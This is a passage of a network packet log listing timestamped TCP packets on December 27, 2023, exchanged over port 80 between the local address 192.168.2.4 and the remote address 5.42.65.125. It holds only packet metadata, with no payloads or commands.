Dec 27, 2023 17:57:26.018954039 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.018969059 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.018982887 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.019004107 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.019593000 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.019612074 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.019624949 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.019642115 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.019670963 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.019726038 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.019742966 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.019783974 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.019783974 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.019802094 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.019819021 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.019853115 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.019862890 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.019898891 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.019994020 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.020011902 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.020025969 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.020040035 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.020054102 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.020066977 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.020081997 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.020095110 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.020097971 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.020109892 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.020124912 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.020133018 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.020143986 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.020184994 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.020706892 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.020733118 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.020750999 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.020764112 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.020781040 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.020797014 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.020798922 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.020828009 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.020839930 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.020860910 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.020930052 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.020946980 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.020962954 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.020977974 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.020978928 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.020993948 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.021002054 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.021012068 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.021027088 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.021040916 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.021042109 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.021058083 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.021081924 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.021104097 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.021797895 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.021816015 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.021876097 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.021924973 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.022089005 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.022104979 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.022114038 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.022121906 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.022128105 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.022135973 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.022136927 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.022151947 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.022170067 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.022172928 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.022181034 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.022190094 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.022197008 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.022203922 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.022212029 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.022249937 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.022277117 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.023102045 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.023128986 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.023181915 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.023183107 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.023200989 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.023216009 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.023231983 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.023247004 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.023251057 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.023289919 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.023293972 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.023312092 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.023320913 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.023335934 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.023405075 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.023418903 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.023421049 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.023438931 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.023447990 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.023456097 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.023471117 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.023487091 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.023488998 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.023503065 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.023519039 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.023564100 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.024025917 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.024041891 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.024056911 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.024070978 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.024084091 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.024091959 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.024096966 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.024101019 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.024138927 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.024195910 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.024210930 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.024225950 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.024240971 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.024255991 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.024261951 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.024271011 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.024285078 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.024285078 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.024301052 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.024307966 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.024308920 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.024374008 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.024940968 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.024955034 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.024987936 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.025001049 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.025002956 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.025010109 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.025036097 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.025044918 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.025044918 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.025057077 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.025070906 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.025087118 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.025094986 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.025105000 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.025137901 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.025166035 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.025181055 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.025188923 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.025197029 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.025209904 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.025238037 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.025276899 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.025993109 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.026007891 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.026070118 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.026072025 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.026124954 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.026144981 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.026223898 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.026390076 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.026406050 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.026413918 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.026470900 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.026485920 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.026485920 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.026503086 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.026518106 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.026531935 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.026535988 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.026546001 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.026581049 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.026593924 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.026601076 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.026608944 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.026613951 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.026688099 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.027328968 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.027347088 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.027359962 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.027375937 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.027391911 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.027391911 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.027407885 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.027415991 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.027424097 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.027432919 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.027457952 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.027476072 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.027486086 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.027535915 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.027576923 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.027591944 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.027600050 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.027607918 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.027623892 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.027631044 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.027642965 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.027683973 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.028001070 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.028043032 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.028059959 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.028100967 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.028141975 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.028165102 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.028182030 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.028191090 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.028238058 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.028295040 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.028310061 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.028325081 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.028331995 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.028337955 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.028341055 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.028352022 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.028364897 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.028373003 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.028379917 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.028390884 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.028425932 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.028940916 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.028966904 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.029011965 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.029017925 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.029213905 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.029228926 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.029236078 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.029244900 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.029253006 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.029267073 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.029273033 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.029280901 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.029289007 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.029295921 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.029295921 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.029304981 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.029320955 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.029335976 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.029350042 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.029351950 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.029366970 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.029371977 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.029428005 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.029934883 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.029973030 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.029989004 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.030002117 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.030034065 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.030045033 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.030061007 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.030062914 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.030117989 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.030213118 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.030253887 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.030268908 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.030276060 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.030282974 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.030291080 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.030303955 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.030313015 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.030319929 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.030328989 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.030329943 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.030417919 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.030953884 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.030970097 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.031019926 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.031042099 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.031104088 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.031164885 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.031179905 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.031191111 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.031224966 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.031265974 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.031282902 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.031296015 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.031311035 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.031323910 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.031327009 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.031333923 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.031342030 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.031352043 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.031356096 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.031361103 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.031416893 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.031850100 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.031867981 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.031917095 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.031941891 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.031956911 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.032041073 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.032056093 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.032082081 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.032109976 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.032110929 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.032125950 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.032145977 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.032161951 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.032172918 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.032196045 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.032222986 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.032238007 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.032250881 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.032264948 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.032278061 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.032279968 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.032291889 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.032305002 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.032309055 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.032322884 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.032335997 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.032361031 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.033023119 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.033051014 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.033063889 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.033077955 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.033092022 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.033097982 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.033109903 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.033116102 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.033124924 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.033139944 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.033154011 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.033154964 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.033185005 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.033304930 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.033319950 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.033334017 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.033348083 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.033361912 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.033365011 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.033379078 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.033392906 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.033394098 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.033431053 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.033461094 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.033878088 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.033893108 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.033941031 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.033941984 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.033958912 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.033974886 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.034006119 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.034104109 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.034120083 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.034132004 CET	80	49738	5.42.65.125	192.168.2.4
